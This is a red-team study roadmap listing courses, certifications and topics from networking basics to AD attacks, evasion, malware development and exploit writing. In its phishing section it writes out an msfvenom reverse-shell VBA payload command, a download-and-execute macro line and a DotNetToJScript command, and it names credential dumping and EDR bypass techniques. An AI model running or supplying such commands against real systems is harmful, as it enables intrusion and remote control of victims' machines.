Red team

Red Team TTP (Tactics, Techniques, and Procedures) 3

Red Team Goals and Development Etmangment 6

Roadmap
Basics

Programming/Networking/OS

Programming

First Learn Programming concept (Not Matter which language, I prefer

first learn C/C++)

Automate Script (Offensive Tools C2) 1

Malwares/Trojans 1

os (Operating System)

Windows

Windows Server 2016 (MCSA)

Domain Controller

Trees

Forest

Trusts

AD objects

Users

Printers

Computer

Groups

Servers

Accounts
 local user accounts

Administrator account

Guest account

SYSTEM

Active Directory Accounts

Administrator

Guest

KRBTGT

Credential authenticators

NT hash

LM Hash

NTLM Authentication process

Credentials storage

SAM Database

LSASS process memory

Process Token

- The security identifier (SID)

- primary token

- Impersonation

Command Prompt

Windows Internal

Windows Services

Processes

Registers

Windows Files

EXE / DLL / PE File Format

Windows API / native API

Memory management

STACK

HEAP
 Memory pages

Virtual Memory

Linux

Networking

CCNA 200/301

Routing/Switching

TCP/IP and Internet Protocol

VLAN/ Subnetting

Networking Security Concept

ACL (Access Control List)

DHCP SPoofing

Port Security

wireshark

Level 1

EJPT

Subdomain Enumeration

Sublist3r

DNSdumpster

Footprinting & Scanning

Masscan

nmap

Vulnerability Assessment

Searchsploit

ExploitDB

Nessus

some vuln

SQL Injection

XSS

SMB Null Attack

oscp & eCPPTv2

oscp

Penetration Testing: What You Should Know

Getting Comfortable with Kali Linux

Command Line Fun

Practical Tools

Bash Scripting

Passive Information Gathering

Active Information Gathering

Vulnerability Scanning

Web Application Attacks

Introduction to Buffer Overflows

Windows Buffer Overflows

Linux Buffer Overflows

Client-Side Attacks

Locating Public Exploits

Fixing Exploits

File Transfers

Antivirus Evasion

Privilege Escalation

Password Attacks

Port Redirection and Tunneling

Active Directory Attacks

The Metasploit Framework

PowerShell Empire

eCPPTv2

Fundamentals of buffer overflow exploits

Cryptography and password cracking

Fundamentals of network security including reconnaissance, spoofing

attacks, post-exploitation, and social engineering

Linux and Windows exploitation and privilege escalation

 Basics of web application security including reconnaissance, cross-site
scripting, and SQL injection

Wi-Fi security and attacks

CTF

Tryhackme

hackthebox

Level 2

post exploitation (Living off the Land)

GitHub - emilyanncr/Windows-Post-Ex…
https://t.me/TheMalware_Team/2934

Gaining access to a client workstation or a server is only the first step in a typical
penetration test. Once we gain initial access, our goal is to compromise more of
the organization’s assets, either to obtain more privileged access, or gain access to
confidential information.

Internal information gathering

Privileges escalation
Checklists/Windows-Privilege-Escalati…
https://github.com/yeyintminthuhtut/Awesome-Red-Teaming#-privilege-
escalation

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodolo
gy%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#cve-2019-
14287

https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-
Escalation.md

persistence 5
GitHub - yeyintminthuhtut/Awesome-…

TCM Security / Hackersploit/ Pentester Academy

Level 3

CRTP/CRTPE (Pentest Academy Courses) & Active directory Attacks and lateral
movement (TCM Security courses)
Stolen credentials
Some command, options, modules need Privilege local Admin such as
Dumping Hashes, persistence, lateral movement, Example: add user to group
admin, need local admin privilege and some enumeration required admin local.
Also Enable and disable some production need admin local.

- Local Administrator Snapshot SAM

- Local Administrator LAPS

Mimikatz

Processing Credentials Offline

Lateral Movement
Some command, options, modules need Privilege local Admin such as
Dumping Hashes, persistence, lateral movement, Example: add user to group
admin, need local admin privilege and some enumeration required admin local.
Also Enable and disable some production need admin local.

There are only a few known lateral movement techniques against

Windows that reuse stolen credentials such as PsExec, WMI, DCOM, and
PSRemoting

Some require clear text credentials and others work with a password
hash like crackmapexec

they all require local administrator access to the target machine.

Pass The hash / password 3

Token Impersonation

Attacks

Local Network Attacks: LLMNR and NBT-NS Poisoning

SMB Relay Attack

IPv6 Attacks (Fake DHCP Server)

Kerberos Delegation Attacks

Spoofing SSDP and UPnP Devices with EvilSSDP

Post-Compromise Enumeration
But before performing any attack using those credentials, it is possible and
necessary to perform advanced enumeration, based on the privileges of the
obtained vectors

Powerview

BloodHound
 enum4linux

crackmapexec

Level 4

OSEP/PTX
https://github.com/In3x0rabl3/OSEP/blob/main/osep_checklistv2.md

https://exploit-me.com/blog/osep-cheat-sheet/

phishing assessment

client side attacks

HTML Smuggling

Windows Script Host

VBS

Jscript

Microsoft Office

VBA

DDE

macro_pack

Luckystrike

unicorn

python windows/download_exec
url=http://192.168.122:8080/test.exe macro

metasploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x

LPORT=xxxx -f vba-psh

DotNetToJScript

DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4

-o demo.js

Email Security

Sender Policy Framework

Bypass Anti-spam

DKIM Verifying message content

Defensive evasion
 Bypass AMSI

Invoke-Obfuscation

Bypass AV

Sections Shellcode Process Injector (C#)

Shellcode Process Hollowing (C#)

Shellcode Process Injector (C# & PS1)

Bypass Application whitelisting

Bypass windows Applocker

include Privilege's Escalation and Lateral movement and AD

Level 5

Book 1: Red Team Development and Operation (SANS SEC564 Red Team
Operation)
.‫هذا الكتاب هو تتويج لسنوات من الخبرة في مجال تكنولوجيا المعلومات والأمن السيبراني‬
‫توجد مكونات هذا الكتاب كملاحظات تقريبية وأفكار وعمليات رسمية طورها المؤلفون‬
‫ تم‬.‫واعتمدوها أثناء قيادتهم وتنفيذ ارتباطات الفريق الأحمر على مدار سنوات عديدة‬
‫استخدام المفاهيم الموضحة في هذا الكتاب للتخطيط الناجح وتقديم وتنفيذ مشاركات‬
‫ تم توثيق بعض هذه المفاهيم ودمجها‬.‫الفريق الأحمر الاحترافية بجميع الأحجام والتعقيدات‬
.‫في عمليات إدارة الفريق الأحمر‬

ENGAGEMENT PLANNING

Roles and responsibilities

Rules of Engagement (ROE)

Thread planning

ENGAGEMENT EXECUTION

Execution's concept

Command and control server (C2)

ENGAGEMENT CULMINATION

ENGAGEMENT REPORTING

Book 2:
Hands_On_Red_Team_Tactics_A_practical_guide_to_mastering_Red_Team. (Red
team practices with Command and control server)

Level 6

Before Sektor7 courses i highly recommended to read this books:

First Book: Malware Analysis And Detection Engineering

 Second book: Learning Malware Analysis Explore the concepts, tools, and
techniques

sektor7 about RED team and malware developmen

Write your own offensive Tools and bypass defenders

Process Injection and Code Injections

DLL Injection / Reflected DLL Injection

Write Your own Dropper

Process Unhooking

API hooking

Module Stomping / PPID Spoof / Command line Spoof

Detected Debuggers / dynamic analysis sandboxs

anti-static & API hashing

Level 7

Cobalt Strike Course: Raphael Mudge Cobalt strike red team course
Red Team Ops with Cobalt Strike (1 of …

Level 8

zeropointsecurity course red team OPS I and Red Team OPS II

Zero-Point Security

RED TEAM OPS I

Command and control

Initial Compromise

Host reconnaissance

Host persistence

Host privilege escalation

and a lot of things .......

RED TEAM OPS II

Defensive Evasion

EDR Evasion

C2 infrastructure

Process Injection
Level 9

Exploit Development

Exploits shellcode handbook Book and gray hat book and the hacking art of
exploit book, and OSED course. for finding and writing your own exploits (3
Books and OSED Course)

Level 10

read Sparc Flow books "How to hack like a legend & how to hack like a
pornstar"